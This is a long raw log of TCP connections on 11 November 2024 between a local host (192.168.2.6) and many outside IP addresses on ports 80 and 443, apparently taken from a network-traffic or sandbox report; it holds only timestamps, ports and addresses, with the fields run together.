                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.150044918 CET8052127178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.150134087 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.214816093 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.215054989 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.250683069 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.250811100 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.257227898 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.261482000 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.387069941 CET8052126188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.387343884 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.459768057 CET8052132178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.459856033 CET5213280192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.467180967 CET5213580192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.472173929 CET8052135208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.472280979 CET5213580192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.476097107 CET8052133199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.476165056 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.476470947 CET8052133199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.476509094 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.500051975 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.500087976 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.512835979 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.512904882 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.107654095 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.107790947 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.112710953 CET8052127178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.113400936 CET8052127178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.606121063 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.606188059 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.942608118 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.943458080 CET5214680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.947671890 CET805214544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.947741985 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.948407888 CET805214644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.948460102 CET5214680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.949095964 CET5214680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.954231977 CET805214644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.988737106 CET5214780192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.989568949 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.994235039 CET80521473.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.994318962 CET5214780192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.994530916 CET5214780192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.994599104 CET805214544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.999918938 CET80521473.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.001646996 CET5214980192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.006628990 CET8052149208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.006694078 CET5214980192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.021907091 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.026880026 CET805215044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.026947021 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.027436018 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.032272100 CET805215044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.032504082 CET5214980192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.037369013 CET8052149208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.390666008 CET805214544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.390727997 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.395109892 CET805214644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.395317078 CET5214680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.403923035 CET805214544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.404289007 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.404445887 CET5214680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.408138990 CET805214644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.408942938 CET5214680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.409301996 CET805214644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.472032070 CET80521473.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.472085953 CET5214780192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.476411104 CET805215044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.478887081 CET80521473.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.478957891 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.480204105 CET5214780192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.484230042 CET805215044.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.487080097 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.494735956 CET8052149208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.495054007 CET5214980192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.908651114 CET5214980192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.910830975 CET5216380192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.911254883 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.914233923 CET8052149208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916191101 CET8052163178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916249990 CET5216380192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916261911 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916313887 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916671991 CET5216380192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.916804075 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.921459913 CET8052163178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.922280073 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.013308048 CET8052149208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.013364077 CET5214980192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.330187082 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.330770016 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.330802917 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.330859900 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.331768036 CET5217280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.335169077 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.335226059 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.335652113 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.336966038 CET805217299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.337028980 CET5217280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.339626074 CET5217280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.340632915 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.344482899 CET805217299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.359539032 CET8052163178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.359590054 CET5216380192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.430238008 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.430241108 CET5216380192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.430255890 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.436026096 CET8052163178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.769769907 CET805217299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.770081997 CET5217280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.771981955 CET5217280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.776424885 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.776473999 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.776609898 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.776622057 CET805217299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.776695967 CET5217280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.776962996 CET805217299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.777127028 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.777142048 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.866388083 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.866534948 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.947762012 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.947787046 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.951630116 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.951776981 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.954055071 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.999326944 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031400919 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031519890 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031533957 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031575918 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031656027 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031969070 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031980991 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031991959 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032004118 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032032967 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032150030 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032820940 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032834053 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032850981 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032871008 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032998085 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036621094 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036706924 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036742926 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036782026 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036847115 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036928892 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.062491894 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.062494040 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.063113928 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.063142061 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067388058 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067399025 CET8050215154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067426920 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067495108 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067936897 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067970037 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067976952 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067998886 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068192005 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068192005 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068675041 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068676949 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068933964 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.072257042 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.072308064 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073546886 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073570013 CET8050215154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073580980 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073693991 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.077194929 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.079880953 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.085056067 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.121963024 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122101068 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122121096 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122133017 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122186899 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122494936 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122507095 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122586966 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122843027 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122854948 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122870922 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122891903 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122946024 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.123346090 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.123357058 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.123575926 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.156930923 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.158371925 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.158371925 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.163120985 CET8050219178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.165069103 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.176939011 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.176985979 CET44350220188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.178250074 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.178325891 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.183110952 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.212680101 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.212945938 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.223047018 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.227824926 CET8050219178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.236927986 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.236941099 CET44350220188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.281229019 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.288928032 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.319842100 CET8054730199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.320591927 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416110992 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416135073 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416491985 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416699886 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.418422937 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.463351011 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.494942904 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.495150089 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.502017975 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.503007889 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.580316067 CET8050219178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.580373049 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.642998934 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643408060 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643440962 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643486977 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643521070 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643532991 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643560886 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.644119024 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.644165993 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.669688940 CET44350220188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.669748068 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.724435091 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.724497080 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.725713968 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.725771904 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.726977110 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.726984978 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727042913 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727058887 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727565050 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727608919 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727616072 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727627039 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727654934 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727663040 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727685928 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727711916 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747026920 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747109890 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747122049 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747199059 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747468948 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747625113 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747636080 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747684002 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748137951 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748148918 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748162985 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748177052 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748192072 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748210907 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.752335072 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.752444983 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.752456903 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.752512932 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.807714939 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.807786942 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.807795048 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.807821035 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.807846069 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.807871103 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809729099 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809776068 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809787989 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809793949 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809812069 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809838057 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.809838057 CET50210443192.168.2.699.83.170.3
